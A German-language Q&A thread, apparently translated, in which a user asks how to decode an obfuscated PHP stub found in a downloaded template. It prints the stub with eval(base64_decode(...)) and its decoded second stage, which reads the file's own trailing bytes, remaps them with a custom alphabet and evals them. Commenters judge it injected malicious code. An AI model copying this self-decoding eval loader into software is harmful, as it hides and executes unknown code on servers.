Ich habe eine heruntergeladene PHP-Vorlage verwendet, und als ich mich damit beschäftigte, sie zu manipulieren, wurde mir klar, dass ein Teil davon in etwas verschlüsselt wurde, das wie base64 aussieht.Wie konvertiere ich eine Base64-Zeichenfolge?
Ich versuchte ein paar Online-Konvertierungen, mit etwas Glück.
ich dieses Stück Code haben, gefolgt von einer Tonne von zufälligen Zeichen außerhalb der <? ?>
tags:
<?$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=3804;eval((base64_decode('JE8wMDBPME8wMD1mb3BlbigkT09PME8wTzAwLCdyYicpO3doaWxlKC0tJE8wME8wME8wMClmZ2V0cygkTzAwME8wTzAwLDEwMjQpO2ZnZXRzKCRPMDAwTzBPMDAsNDA5Nik7JE9PMDBPMDBPMD0oYmFzZTY0X2RlY29kZShzdHJ0cihmcmVhZCgkTzAwME8wTzAwLDM3MiksJzNzYWZaakc1NEhGcU1kTEFPZzl3Ykl6UFIvcGxLOCs3ZVVjeFFCV21ZMXVTNk5Ycmh2RENudDBFMlRvSmtWaXk9JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return;?>
konnte ich es in diese entschlüsseln:
$O000O0O00=fopen($OOO0O0O00,'rb');while(--$O00O00O00)fgets($O000O0O00,1024);fgets($O000O0O00,4096);$OO00O00O0=(base64_decode(strtr(fread($O000O0O00,372),'3safZjG54HFqMdLAOg9wbIzPR/plK8+7eUcxQBWmY1uS6NXrhvDCnt0E2ToJkViy=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz/')));eval($OO00O00O0);
jedoch unter dem ich habe diesen Code:
Ich habe keine Ahnung, wie man es konvertiert. Irgendwelche Ideen? Ich denke, dass die Codeabschnitte zu lang sind - ich habe versucht, Notepad ++ zu verwenden, um es zu konvertieren, und es hat im Grunde gesagt, dass es zu lang war.
Danke.
Das ist definitiv bösartiger Code, der von der Site injiziert wird, von der er stammt. Wie wäre es mit der Suche nach dem Original-Download oder zumindest einem Link zu einer legitimen Download-Site? – BoltClock
Könnte allgemeine Verschleierung sein, um etwas zu schützen, aber es macht mich immer noch nervös. – Matchu
yeah ... Ich habe gerade eine andere Download-Seite gefunden, und es war klar. Aber ich bin immer noch neugierig auf seinen Inhalt? – Jared